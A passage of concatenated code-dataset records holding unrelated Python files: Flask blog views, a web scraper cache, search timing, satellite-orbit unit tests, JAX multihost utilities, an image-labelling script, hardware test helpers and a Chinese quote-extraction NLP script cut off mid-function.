并且将这些数据传给 form 对象, 成为其实例属性.\r\n # Form object: `Comment`\r\n form = CommentForm()\r\n # form.validate_on_submit() will be true and return the\r\n # data object to form instance from user enter,\r\n # when the HTTP request is POST\r\n if form.validate_on_submit():\r\n new_comment = Comment(id=str(uuid4()),\r\n name=form.name.data)\r\n new_comment.text = form.text.data\r\n new_comment.date = datetime.datetime.now()\r\n new_comment.post_id = post_id\r\n db.session.add(new_comment)\r\n db.session.commit()\r\n\r\n post = Post.query.get_or_404(post_id)\r\n tags = post.tags\r\n comments = post.comments.order_by(Comment.date.desc()).all()\r\n recent, top_tags = sidebar_data()\r\n\r\n return render_template('post.html',\r\n post=post,\r\n tags=tags,\r\n comments=comments,\r\n form=form,\r\n recent=recent,\r\n 
top_tags=top_tags)\r\n\r\n\r\n\r\n@app.route('/post/')\r\ndef post(post_id):\r\n \"\"\"View function for post page\"\"\"\r\n\r\n post = db.session.query(Post).get_or_404(post_id)\r\n tags = post.tags\r\n comments = post.comment.order_by(Comment.date.desc()).all()\r\n recent, top_tags = sidebar_data()\r\n\r\n return render_template('post.html',\r\n post=post,\r\n tags=tags,\r\n comments=comments,\r\n recent=recent,\r\n top_tags=top_tags)\r\n\r\n\r\n@app.route('/tag/')\r\ndef tag(tag_name):\r\n \"\"\"View function for tag page\"\"\"\r\n\r\n tag = db.session.query(Tag).filter_by(name=tag_name).first_or_404()\r\n posts = tag.posts.order_by(Post.publish_date.desc()).all()\r\n recent, top_tags = sidebar_data()\r\n\r\n return render_template('tag.html',\r\n tag=tag,\r\n posts=posts,\r\n recent=recent,\r\n top_tags=top_tags)\r\n\r\n\r\n@app.route('/user/')\r\ndef user(username):\r\n \"\"\"View function for user page\"\"\"\r\n user = db.session.query(User).filter_by(username=username).first_or_404()\r\n posts = user.posts.order_by(Post.publish_date.desc()).all()\r\n recent, top_tags = sidebar_data()\r\n\r\n return render_template('user.html',\r\n user=user,\r\n posts=posts,\r\n recent=recent,\r\n top_tags=top_tags)","sub_path":"PycharmProjects/Reptile/Djang-flask/M(V)C_view.py","file_name":"M(V)C_view.py","file_ext":"py","file_size_in_byte":5371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"549619822","text":"\nimport socket\nimport requests.packages.urllib3.util.connection as urllib3_cn\nfrom hashlib import sha256\nimport pickle\nimport gzip\nfrom pathlib import Path\n\nimport requests\nimport bs4\nimport json\nimport pickle\nimport datetime\nfrom concurrent.futures import ProcessPoolExecutor as PPE\nimport itertools\nimport pandas as pd\nimport re\n\nHERE = Path(__file__).resolve().parent\nTOP_FOLDER = Path(__file__).resolve().parent.parent.parent\n\nPath(f'{TOP_FOLDER}/var/TB/downloads').mkdir(exist_ok=True, 
parents=True)\n\ndef get_hashed_fs(url):\n hashed = sha256(bytes(url, 'utf8')).hexdigest()[:16]\n fn = f'{TOP_FOLDER}/var/TB/downloads/{hashed}'\n return fn\n\n\ndef is_deleted(url):\n fn = get_hashed_fs(url)\n if not Path(fn).exists():\n return False\n obj = pickle.loads(gzip.decompress(open(fn, 'rb').read()))\n if obj['DELETED'] == True:\n return True\n else:\n return False\n\n\ndef is_over_5times(url):\n fn = get_hashed_fs(url)\n if not Path(fn).exists():\n return False\n obj = pickle.loads(gzip.decompress(open(fn, 'rb').read()))\n if len(obj['HTMLS']) >= 3:\n return True\n else:\n return False\n\n\ndef save(url, obj):\n fn = get_hashed_fs(url)\n # if not Path(fn).exists():\n open(fn, 'wb').write(gzip.compress(pickle.dumps(obj)))\n\ndef delete(url):\n fn = get_hashed_fs(url)\n Path(fn).unlink()\n\ndef get(url):\n fn = get_hashed_fs(url)\n if not Path(fn).exists():\n return None\n obj = pickle.loads(gzip.decompress(open(fn, 'rb').read()))\n return obj\n\n\ndef update_html(url, obj):\n fn = get_hashed_fs(url)\n obj_ = pickle.loads(gzip.decompress(open(fn, 'rb').read()))\n obj_['HTMLS'].append(obj)\n save(url, obj_)\n\n\ndef allowed_gai_family():\n \"\"\"\n https://github.com/shazow/urllib3/blob/master/urllib3/util/connection.py\n \"\"\"\n family = socket.AF_INET\n # if urllib3_cn.HAS_IPV6:\n # family = socket.AF_INET6 # force ipv6 only if it is available\n return family\n\n\nurllib3_cn.allowed_gai_family = allowed_gai_family\n\n\ndef get_seeds():\n '''\n 最も最近に投稿されたまとめから最大値を逆算する\n '''\n print(f'try to get_seed {__name__}.')\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.131 Safari/537.36',\n 'referer': 'https://www.google.com/'\n }\n r = requests.get('https://togetter.com/recent', headers=headers)\n thumbs = bs4.BeautifulSoup(r.text, 'lxml').find('div', {'class': 'topics_box'}).find_all('a', {'class': 'thumb'})\n thumb = thumbs[0]\n max_url = thumb.get('href')\n max_post_id = 
re.search(r'https://togetter.com/li/(.*?$)', max_url).group(1)\n if max_post_id.isdigit() is False:\n raise Exception('There is any wrong to get latest id.')\n print(f'finish to get_seed {__name__}.')\n return max_post_id\n","sub_path":"DataCollection/TogetterSystem/FSDB.py","file_name":"FSDB.py","file_ext":"py","file_size_in_byte":2883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"403402392","text":"#Peräkkäishaku\n# tuodaan random ja time paketit\nimport random \nimport time\nlista = [] # alustetaan lista\n\nfor x in range(0,100000001):\n lista.append(x) # lisätään listaan haluttu määrä lukuja nollasta eteenpäin\n \ndef Peräkkäis(lista = []): # luodaan funktio, joka toteuttaa peräkkäishaun\n etsi = len(lista) -1 # asetetaan etsittäväksi luvuksi listan viimeinen luku\n for i in range (len(lista)): # for silmukka, jossa käydään listan alkiot yksi kerrallaan läpi\n if lista[i] == etsi: # verrataan i:n arvoa etsittävän numeron arvoon\n return(\"Hakemasi numero löytyi muistipaikalta: \"\n + str(i)) # jos etsittävä numero löytyy, palautetaan muistipaikan numero\n break;# silmukka keskeytetään\n return(\"Hakemaasi numeroa ei löytynyt\") # jos lista käydään kokonaan läpi, eikä etsittävää numeroa löydy, palautetaan ilmoitus\n\n\nstart = time.time() # aloitetaan kellotus\nprint(Peräkkäis(lista))# kutsutaan Peräkkäis funktiota lista parametrillä\nend = time.time() # pysäytetään kellotus\n\nprint(\"Hakuun kului aikaa\", end-start, \"sekuntia\") # tulostetaan hakuun kulunut aika","sub_path":"Other/Tietorakenteet ja algoritmit/Peräkkäishaku.py","file_name":"Peräkkäishaku.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"28080077","text":"# MIT License\n#\n# Copyright (c) 2017 Satellogic SA\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation 
files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nimport datetime\nimport os\nimport shutil\nimport tempfile\nimport unittest\n\nfrom orbit_predictor import sources\nfrom orbit_predictor.accuratepredictor import HighAccuracyTLEPredictor\nfrom orbit_predictor.predictors import TLEPredictor\n\ntry:\n from unittest.mock import Mock, patch\nexcept ImportError:\n from mock import Mock, patch # Python2\n\ntry:\n from urllib import parse as urlparse\nexcept ImportError:\n import urlparse # Python2\n\n\nSATE_ID = \"AAUSAT-II\"\nSAMPLE_TLE = (\"1 32788U 08021F 15227.82608814 .00001480 00000-0 15110-3 0 9997\",\n \"2 32788 97.6474 275.2739 0011863 204.9398 155.1249 14.92031413395491\")\n\nSAMPLE_TLE2 = (\"1 32791U 08021J 15228.17298173 .00001340 00000-0 14806-3 0 9999\",\n \"2 32791 97.6462 271.6584 0012961 215.4867 144.5490 14.88966377395242\")\n\n\nclass TestMemoryTLESource(unittest.TestCase):\n def setUp(self):\n self.db = sources.MemoryTLESource()\n\n def test_add_tle(self):\n self.db.add_tle(SATE_ID, SAMPLE_TLE, datetime.datetime.now())\n tle = self.db._get_tle(SATE_ID, 
datetime.datetime.now())\n self.assertEqual(tle, SAMPLE_TLE)\n\n def test_add_tle_twice(self):\n self.db.add_tle(SATE_ID, SAMPLE_TLE, datetime.datetime.now())\n self.db.add_tle(SATE_ID, SAMPLE_TLE2, datetime.datetime.now())\n tle = self.db._get_tle(SATE_ID, datetime.datetime.now())\n self.assertEqual(tle, SAMPLE_TLE2)\n\n def test_add_tle_two_id(self):\n self.db.add_tle(SATE_ID, SAMPLE_TLE, datetime.datetime.now())\n self.db.add_tle(\"fake_id\", SAMPLE_TLE2, datetime.datetime.now())\n tle = self.db._get_tle(SATE_ID, datetime.datetime.now())\n self.assertEqual(tle, SAMPLE_TLE)\n\n def test_empty(self):\n with self.assertRaises(LookupError):\n self.db._get_tle(SATE_ID, datetime.datetime.now())\n\n # this methods are from TLESource()\n def test_get(self):\n date = datetime.datetime.now()\n self.db.add_tle(SATE_ID, SAMPLE_TLE, date)\n tle = self.db.get_tle(SATE_ID, date)\n self.assertEqual(tle.lines, SAMPLE_TLE)\n self.assertEqual(tle.sate_id, SATE_ID)\n self.assertEqual(tle.date, date)\n\n def test_get_predictor(self):\n predictor = self.db.get_predictor(SATE_ID)\n\n self.assertIsInstance(predictor, TLEPredictor)\n self.assertEqual(predictor.sate_id, SATE_ID)\n self.assertEqual(predictor.source, self.db)\n\n def test_get_predictor_precise(self):\n predictor = self.db.get_predictor(SATE_ID, precise=True)\n self.assertIsInstance(predictor, HighAccuracyTLEPredictor)\n self.assertEqual(predictor.sate_id, SATE_ID)\n self.assertEqual(predictor.source, self.db)\n\n\nclass TestEtcTLESource(unittest.TestCase):\n def setUp(self):\n self.dirname = tempfile.mkdtemp()\n self.filename = os.path.join(self.dirname, \"tle_file\")\n\n with open(self.filename, \"w\") as fd:\n fd.write(SATE_ID + \"\\n\")\n for l in SAMPLE_TLE:\n fd.write(l + \"\\n\")\n\n def test_add_tle(self):\n db = sources.EtcTLESource(self.filename)\n\n db.add_tle(SATE_ID, SAMPLE_TLE2, datetime.datetime.now())\n tle = db._get_tle(SATE_ID, datetime.datetime.now())\n self.assertEqual(tle, SAMPLE_TLE2)\n\n def 
test_read_tle(self):\n db = sources.EtcTLESource(self.filename)\n\n tle = db._get_tle(SATE_ID, datetime.datetime.now())\n self.assertEqual(tle, SAMPLE_TLE)\n\n def test_wrong_sate(self):\n db = sources.EtcTLESource(self.filename)\n\n with self.assertRaises(LookupError):\n db._get_tle(\"fake_id\", datetime.datetime.now())\n\n def tearDown(self):\n shutil.rmtree(self.dirname)\n\n\nclass TestWSTLESource(unittest.TestCase):\n def setUp(self):\n self.mock_json = {\n \"date\": \"2015-01-15T08:56:33Z\",\n \"lines\": [\n \"1 40014U 14033E 15014.37260739 .00003376 00000-0 33051-3 0 6461\",\n \"2 40014 97.9772 276.7067 0034296 17.9121 342.3159 14.92570778 31092\"\n ]\n }\n\n self.expected_lines = (\n \"1 40014U 14033E 15014.37260739 .00003376 00000-0 33051-3 0 6461\",\n \"2 40014 97.9772 276.7067 0034296 17.9121 342.3159 14.92570778 31092\")\n\n self.headers = {'user-agent': 'orbit-predictor', 'Accept': 'application/json'}\n\n @patch(\"requests.get\")\n def test_get_tle(self, mocked_requests):\n expected_url = urlparse.urlparse(\n \"http://test.none/api/tle/closest/?date=2015-01-01&satellite_number=40014U\")\n expected_qs = urlparse.parse_qs(expected_url.query)\n\n mocked_response = Mock()\n mocked_response.ok = True\n mocked_response.json.return_value = self.mock_json\n mocked_requests.return_value = mocked_response\n\n source = sources.WSTLESource(url=\"http://test.none/\")\n tle = source._get_tle('40014U', datetime.datetime(2015, 1, 1))\n\n call_args = mocked_requests.call_args\n url = urlparse.urlparse(call_args[0][0])\n url_qs = urlparse.parse_qs(url.query)\n\n self.assertEqual(url.path, expected_url.path)\n self.assertEqual(url_qs, expected_qs)\n self.assertEqual(call_args[1], {'headers': self.headers})\n self.assertEqual(tle, self.expected_lines)\n\n @patch(\"requests.get\")\n def test_get_last_update(self, mocked_requests):\n url = \"http://test.none/api/tle/last/?satellite_number=40014U\"\n mocked_response = Mock()\n mocked_response.ok = True\n 
mocked_response.json.return_value = self.mock_json\n mocked_requests.return_value = mocked_response\n\n source = sources.WSTLESource(url=\"http://test.none/\")\n tle = source.get_last_update('40014U')\n\n mocked_requests.assert_called_with(url, headers=self.headers)\n self.assertEqual(tle, self.expected_lines)\n","sub_path":"tests/test_sources.py","file_name":"test_sources.py","file_ext":"py","file_size_in_byte":6969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"366867132","text":"# Copyright 2021 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Utilities for synchronizing and communication across multiple hosts.\"\"\"\n\nimport functools\nfrom typing import Optional\nimport zlib\n\nimport jax\nfrom jax.tree_util import PyTreeDef\nfrom jax.experimental import maps\nfrom jax.experimental.pjit import pjit, FROM_GDA\nfrom jax.interpreters.pxla import PartitionSpec as P\nfrom jax.experimental.global_device_array import GlobalDeviceArray\nimport numpy as np\n\n\n# This needs to be top-level for the jax compilation cache.\n@functools.partial(jax.pmap, axis_name='hosts')\ndef _psum(x: PyTreeDef) -> PyTreeDef:\n return jax.lax.psum(x, 'hosts')\n\n\ndef broadcast_one_to_all(in_tree: PyTreeDef,\n is_source: Optional[bool] = None) -> PyTreeDef:\n \"\"\"Broadcast data from a source host (host 0 by default) to all other hosts.\n\n Args:\n in_tree: pytree of arrays - each array *must* have the same 
shape across the\n hosts.\n is_source: optional bool denoting whether the caller is the source. Only\n 'source host' will contribute the data for the broadcast. If None, then\n host 0 is used.\n\n Returns:\n A pytree matching in_tree where the leaves now all contain the data from the\n first host.\n \"\"\"\n if is_source is None:\n is_source = jax.process_index() == 0\n\n def pre_pmap(x):\n if isinstance(x, GlobalDeviceArray):\n raise ValueError('GDAs cannot be broadcasted from source host to other '\n 'hosts.')\n if is_source:\n return np.concatenate([\n x[None, ...],\n np.repeat([np.zeros_like(x)],\n jax.local_device_count() - 1, 0)\n ])\n else:\n return np.repeat([np.zeros_like(x)], jax.local_device_count(), 0)\n\n def post_pmap(x):\n return jax.device_get(x)[0]\n\n in_tree = jax.tree_map(pre_pmap, in_tree)\n in_tree = jax.device_get(_psum(in_tree))\n return jax.tree_map(post_pmap, in_tree)\n\n\ndef sync_global_devices(name: str):\n \"\"\"Creates a barrier across all hosts/devices.\"\"\"\n h = np.int32(zlib.crc32(name.encode()))\n assert_equal(h, f\"sync_global_devices name mismatch ('{name}')\")\n\n\ndef process_allgather(in_tree: PyTreeDef, tiled: bool = False) -> PyTreeDef:\n \"\"\"Gather data from across processes.\n\n Args:\n in_tree: pytree of arrays - each array _must_ have the same shape across the\n hosts.\n tiled: Whether to stack or concat the output. Defaults to False i.e. stack\n into a new positional axis at index 0.\n This does not affect GDA inputs as the GDA output will always be\n concatenated.\n Scalar inputs will always be stacked.\n\n Returns:\n Pytress of arrays where the data is gathered from all hosts.\n * If the input is a GDA, then the data is fully replicated.\n * If the input is non-GDA, then the output shape is dependent on the\n `tiled` argument. 
If its False, then the output will be stacked else\n concatenated.\n * If the input is non-GDA and scalar, then the output will be stacked.\n \"\"\"\n\n def _pjit(inp):\n if isinstance(inp, GlobalDeviceArray):\n if inp.is_fully_replicated:\n return inp.local_data(0).to_py()\n global_mesh = inp.mesh\n in_axis_resources = FROM_GDA\n else:\n # DA/SDA/np.array will be sharded based on global_mesh.local_mesh.\n # Shape of local_mesh will always be (1, local_device_count())\n devices = np.array(jax.devices()).reshape(jax.process_count(),\n jax.local_device_count())\n global_mesh = maps.Mesh(devices, ('processes', 'local_devices'))\n in_axis_resources = P('processes')\n if inp.ndim == 0 or not tiled:\n inp = np.expand_dims(inp, axis=0)\n\n with maps.Mesh(global_mesh.devices, global_mesh.axis_names):\n out = pjit(lambda x: x, in_axis_resources=in_axis_resources,\n out_axis_resources=None)(inp)\n return out.local_data(0).to_py()\n\n with jax._src.config.parallel_functions_output_gda(True):\n return jax.tree_map(_pjit, in_tree)\n\n\ndef assert_equal(in_tree, fail_message: str = ''):\n \"\"\"Verifies that all the hosts have the same tree of values.\"\"\"\n expected = broadcast_one_to_all(in_tree)\n if not jax.tree_util.tree_all(\n jax.tree_map(lambda *x: np.all(np.equal(*x)), in_tree, expected)):\n raise AssertionError(\n f'{fail_message} Expected: {expected}; got: {in_tree}.')\n","sub_path":"jax/experimental/multihost_utils.py","file_name":"multihost_utils.py","file_ext":"py","file_size_in_byte":4875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"457789665","text":"# _*_ coding: utf-8 _*_\r\n\r\nfrom PIL import Image,ImageFont,ImageDraw,ImageColor\r\n\r\ndef image_add_num(image,text):\r\n # 设置字体\r\n font = ImageFont.truetype(\"arial.ttf\",50)\r\n # 设置字体颜色\r\n font_color = ImageColor.colormap.get('red')\r\n # 将字体加到图片上\r\n draw = ImageDraw.Draw(image)\r\n width,height = image.size\r\n print(width-50,height)\r\n 
draw.text((width-50,30),text,font=font,fill=font_color)\r\n # 保存图片\r\n image.save(\"image_2.jpg\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n image = Image.open(\"image_1.jpg\")\r\n text = \"4\"\r\n image_add_num(image,text)","sub_path":"0/0.py","file_name":"0.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"74411093","text":"import sys\nimport test.iio_scanner as iio_scanner\nfrom test.globals import *\n\nimport iio\n\nimport adi\nimport numpy as np\nimport pytest\n\n\ndef command_line_config(request):\n if request.config.getoption(\"--error_on_filter\"):\n global ignore_skip\n ignore_skip = True\n\n global target_uri_arg\n target_uri_arg = request.config.getoption(\"--uri\")\n if not target_uri_arg:\n target_uri_arg = None\n\n global imported_config\n filename = request.config.getoption(\"--test-configfilename\")\n imported_config = get_test_config(filename)\n\n\ndef pytest_addoption(parser):\n parser.addoption(\n \"--error_on_filter\",\n action=\"store_true\",\n help=\"When device is not found generate error not skip\",\n )\n parser.addoption(\n \"--uri\",\n action=\"store\",\n help=\"Run test on device with the given uri. 
IP scanning will be skipped.\",\n )\n parser.addoption(\n \"--test-configfilename\",\n action=\"store\",\n help=\"Import custom configuration file not in default location.\",\n )\n\n\ndef pytest_configure(config):\n # Add customer marks to ini to remove warnings\n from test import test_map as tm\n\n test_map = tm.get_test_map()\n vals = []\n for k in test_map:\n vals = vals + test_map[k]\n keys = np.unique(np.array(vals))\n for k in keys:\n config.addinivalue_line(\"markers\", k.replace(\"-\", \"_\"))\n\n\ndef pytest_collection_modifyitems(items):\n # Map HDL project names to tests as markers\n from test import test_map as tm\n\n test_map = tm.get_test_map()\n test_map_keys = test_map.keys()\n\n for item in items:\n if item.originalname:\n for key in test_map_keys:\n if key in item.originalname:\n for marker in test_map[key]:\n item.add_marker(marker.replace(\"-\", \"_\"))\n break\n\n\nclass BaseTestHelpers:\n devicename = \"pluto\"\n skipped_tests = [] # type: ignore\n classname = \"adi.ad9361\"\n uri = \"ip:pluto.local\"\n\n def check_skip(self):\n # Check if calling function is in skip list\n calling_func = sys._getframe(1).f_code.co_name\n global ignore_skip\n if (calling_func in self.skipped_tests) or (not self.check_dev()):\n if not ignore_skip:\n # Will skip test if board not found or calling_func in skipped_tests\n pytest.skip(\"Skipping\")\n else:\n # Will fail if board not found or calling_func in skipped_tests\n pytest.fail(\"Board not found!\")\n\n def check_dev(self):\n # Must use globals since each test is a separate class instance\n global found_devices\n global found_uris\n global target_uri_arg\n global imported_config\n global ignore_skip\n if not isinstance(self.devicename, list):\n ds = [self.devicename]\n else:\n ds = self.devicename\n dev_checked = False\n found_dev = False\n for d in ds:\n if d in found_devices:\n found_dev = found_devices[d]\n # If device was already found before, update the board interface URI\n self.uri = found_uris[d]\n 
dev_checked = True\n break\n\n if not dev_checked:\n if target_uri_arg:\n found_dev, board = iio_scanner.find_device(\n self.devicename, target_uri_arg, imported_config, ignore_skip\n )\n else:\n found_dev, board = iio_scanner.find_device(\n self.devicename, None, imported_config, ignore_skip\n )\n\n if found_dev:\n found_devices[board.name] = found_dev\n found_uris[board.name] = board.uri\n self.uri = board.uri\n else:\n for d in ds:\n found_devices[d] = False\n found_uris[d] = \"\"\n return found_dev\n\n def dev_interface(self, val, attr, tol):\n sdr = eval(self.classname + \"(uri='\" + self.uri + \"')\")\n # Check hardware\n if not hasattr(sdr, attr):\n raise AttributeError(attr + \" not defined in \" + self.classname)\n setattr(sdr, attr, val)\n rval = getattr(sdr, attr)\n if not isinstance(rval, str):\n rval = float(rval)\n del sdr\n if not isinstance(val, str):\n if abs(val - rval) > tol:\n print(\"Failed to set: \" + attr)\n print(\"Set: \" + str(val))\n print(\"Got: \" + str(rval))\n return abs(val - rval)\n else:\n return val == str(rval)\n\n def iio_dev_interface(self, attrtype, dev_name, chan_name, inout, attr, val, tol):\n sdr = iio.Context(self.uri)\n attr_tl = attrtype.lower()\n\n if attr_tl == \"context\":\n ats = sdr.attrs\n ats[attr].Value = str(val)\n rval = float(sdr.attrs[attr].Value)\n elif attr_tl == \"debug\":\n raise Exception(\"Not supported\")\n elif attr_tl == \"device\":\n dev = sdr.find_device(dev_name)\n assert dev, \"Device Not Found\"\n dev.attrs[attr].Value = str(val)\n rval = float(dev.attrs[attr].Value)\n elif attr_tl == \"channel\":\n dev = sdr.find_device(dev_name)\n assert dev, \"Device Not Found\"\n chan = dev.find_channel(chan_name, inout)\n assert chan, \"Channel Not Found\"\n chan.attrs[attr].Value = str(val)\n rval = float(chan.attrs[attr].Value)\n else:\n raise Exception(\"Device type unknown \" + str(attrtype))\n\n del sdr\n if not isinstance(val, str):\n if abs(val - rval) > tol:\n print(\"Failed to set: \" + attr)\n 
print(\"Set: \" + str(val))\n print(\"Got: \" + str(rval))\n return abs(val - rval)\n return val == str(rval)\n\n\nclass BoardInterface(BaseTestHelpers):\n def __init__(self, classname=None, devicename=None):\n self.classname = classname\n self.devicename = devicename\n self.uri = \"\"\n self.check_skip()\n","sub_path":"test/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":6180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"48949500","text":"#获取人名说了什么话,返回人名 论点\nimport jieba.posseg as psg\nimport jieba,re\nfrom stanfordcorenlp import StanfordCoreNLP\nimport os, sys\nfrom pyltp import SentenceSplitter, Segmentor, Postagger, Parser, NamedEntityRecognizer, SementicRoleLabeller\n\n\ndef get_say(filename):\n '''获取说的词典'''\n res=[]\n f_r=open(filename,\"r\",encoding=\"utf-8\")\n for line in f_r:\n line=line.strip(\"\\n\")\n lines=line.split(\",\")\n res.extend([data for data in lines if data])\n return list(set(res))\n\n\ndef raplace_line_feed(sentence):\n return sentence.replace(\"\\u3000\",\" \")\n\ndef more_space_to_one(sentence):\n sen=jieba.lcut(sentence)\n new_data=[]\n for data in sen:\n if new_data:\n if new_data[-1] not in [\" \",\" \"]:\n new_data.append(data)\n elif data not in [\" \",\" \"]:\n new_data.append(data)\n else:\n new_data.append(data)\n return \"\".join(new_data)\n\n\ndef get_name(netags,words):\n res=[]\n #print(list(netags))\n for i,data in enumerate(list(netags)):\n if data[2:]==\"Nh\":\n res.append(words[i])\n return list(set(res))\n\n\ndef get_one_name(new_sentence):\n #对于这个句子进行文本处理,获取这个句子中的姓名实体\n name_list=[]\n # new_sentence=raplace_line_feed(new_sentence)\n # new_sentence=more_space_to_one(new_sentence)\n ner_data=psg.lcut(new_sentence)\n i=0\n for w,tag in ner_data:\n if tag==\"nr\":\n name_list.append(w)\n i += 1\n return list(set(name_list))\n\n\ndef get_dependency_word(sentence):\n '''获取句法分析'''\n # global nlp\n parse_res=[]\n nlp = 
StanfordCoreNLP(r'D:/stanford/stanford-corenlp-full-2018-10-05', lang='zh')\n word = nlp.word_tokenize(sentence)\n res = nlp.dependency_parse(sentence)\n new_data = []\n new_data.append(\"ROOT\")\n new_data += word\n for i, w in enumerate(res):\n parse_res.append([w[0], new_data[int(w[1])], new_data[int(w[2])]])\n nlp.close()\n return parse_res\n\n\ndef judge_which_say(say_words,sentence):\n '''判断句子中有哪个表示说的词'''\n res_words=[]\n # wordslist=list(set(jieba.lcut(sentence)))\n for word in say_words:\n if word in sentence:\n return True\n return False\n\n\ndef get_say_sentence(sentence,say):\n '''获取包含say的最简短的sentence'''\n senlist=[]\n new_sen=sentence.split(r\"\\n\")\n for sen in new_sen:\n if say in sen:\n senlist.append(sen)\n return senlist\n\ndef get_saywords(sentence,say,per):\n if sentence[-1] != \"。\":\n res1 = re.findall(per + \"(?:[^,.。))]*?)\" + say + \"(?:[^.。]*?)\" + \"(?:,|:|:|,)([\\s\\S]*?)$\", sentence)\n else:\n res1 = re.findall(per + \"(?:[^,.。))]*?)\" + say + \"(?:[^.。]*?)\" + \"(?:,|:|:|,)([\\s\\S]*?)。\", sentence)\n res2 = re.findall('(?:“|\")([\\s\\S]*?)(?:”|\")(?:,|,)?' 
+ \"(?:[^,.。,)]*?)\" + per + \"(?:[^,.。,)]*?)\" + say, sentence)\n if res2!=[]:\n return res2[0]\n if res1!=[]:\n return res1[0]\n return \"\"\n\ndef judge_parse(parse_list,say,sentence):\n '''对解析的内容进行判断是不是'''\n says=\"\"\n idex=0\n name=\"\"\n for i,data in enumerate(parse_list):\n if data[0]==\"nsubj\" and data[1]==say:\n if get_one_name(data[-1])==[data[-1]]:\n # idex=i\n name=data[-1]\n if data[0]==\"punct\":\n idex=i\n if i>idex and data[0]!=\"punct\" and idex!=0:\n says+=data[-1]\n else:\n says=get_saywords(sentence, say, name)\n return says,name\n\n\ndef get_per_and_say(say_list,postags,words,sentence,parser):\n # words = segmentor.segment(sentence)\n atts={}\n per_say=[]\n s=list(words)\n res=[]\n res.append(\"ROOT\")\n res.extend(list(words))\n arcs = parser.parse(words, postags)\n dd=[(s[i],res[int(arc.head)],arc.relation) for i,arc in enumerate(arcs)]\n for da in dd:\n if da[-1]==\"SBV\":\n if da[1] in say_list:\n if da[0] in atts:\n poss_per=\"\".join(atts[da[0]])\n if poss_per in sentence:\n per_say.append((poss_per+da[0],da[1]))\n else:\n per_say.append((poss_per+da[0],da[1]))\n if da[-1]==\"ATT\":\n if da[1] not in atts:\n atts[da[1]]=[]\n atts[da[1]].append(da[0])\n return per_say\n\n\n#一个人说的话一共三种情况,1.最简单的一种就是人名后面紧跟说,说后面紧跟说的话 2.人名后面紧跟说,人名前面用引号引住说的话。3.其他格式\ndef get_some_idea(say_words,postags,words,senten,parser):\n #根据与表述相关的词的词库,获取每个人说的话\n say_words_list={}\n per_say=get_per_and_say(say_words,postags,words,senten,parser)#say_list,postags,words,sentence,parser\n if per_say!=[]:\n for data in per_say:\n if len(data)==2:\n ls=get_saywords(senten,data[-1],data[0])\n if ls:\n if data[0] not in say_words_list:\n say_words_list[data[0]] = []\n say_words_list[data[0]].append((data[-1], ls))\n return say_words_list\n\n\ndef get_models():\n LTP_DATA_DIR = r'ltp_data_v3.4.0' # LTP模型目录路径\n # 分词\n segmentor = Segmentor() # 初始化\n segmentor.load(os.path.join(LTP_DATA_DIR, 'cws.model')) # 加载模型\n # 词性标注\n postagger = Postagger() # 初始化\n 
postagger.load(os.path.join(LTP_DATA_DIR, 'pos.model')) # 加载模型\n parser = Parser()\n parser.load(os.path.join(LTP_DATA_DIR, 'parser.model'))\n return segmentor,postagger,parser\n\n\ndef get_all_say_sentence(r_filename,w_file):\n segmentor, postagger, parser=get_models()\n say_words = get_say(\"say.txt\")\n f_r=open(r_filename,\"r\",encoding=\"utf-8\")\n f_w=open(w_file,\"w\",encoding=\"utf-8\")\n for line in f_r:\n lines=line.strip(\"\\n\").split(r\"\\n\")\n for senten in lines:\n have_or_not=judge_which_say(say_words,senten)\n if have_or_not:\n new_sentence = raplace_line_feed(senten)\n new_sentence = more_space_to_one(new_sentence)\n words = segmentor.segment(new_sentence)\n postags = postagger.postag(words)\n sen=get_some_idea(say_words,postags,words,new_sentence,parser)\n if sen:\n for key in sen:\n sens=\"\\t\".join(list(set([data[1] for data in sen[key]])))\n f_w.write(key +\"\\t\"+sens +\"\\n\")\n f_r.close()\n f_w.close()\n\n\ndef get_one_say_sentence(line):\n res={}\n segmentor, postagger, parser=get_models()\n say_words = get_say(\"say.txt\")\n lines=line.strip(\"\\n\").split(r\"\\n\")\n for senten in lines:\n 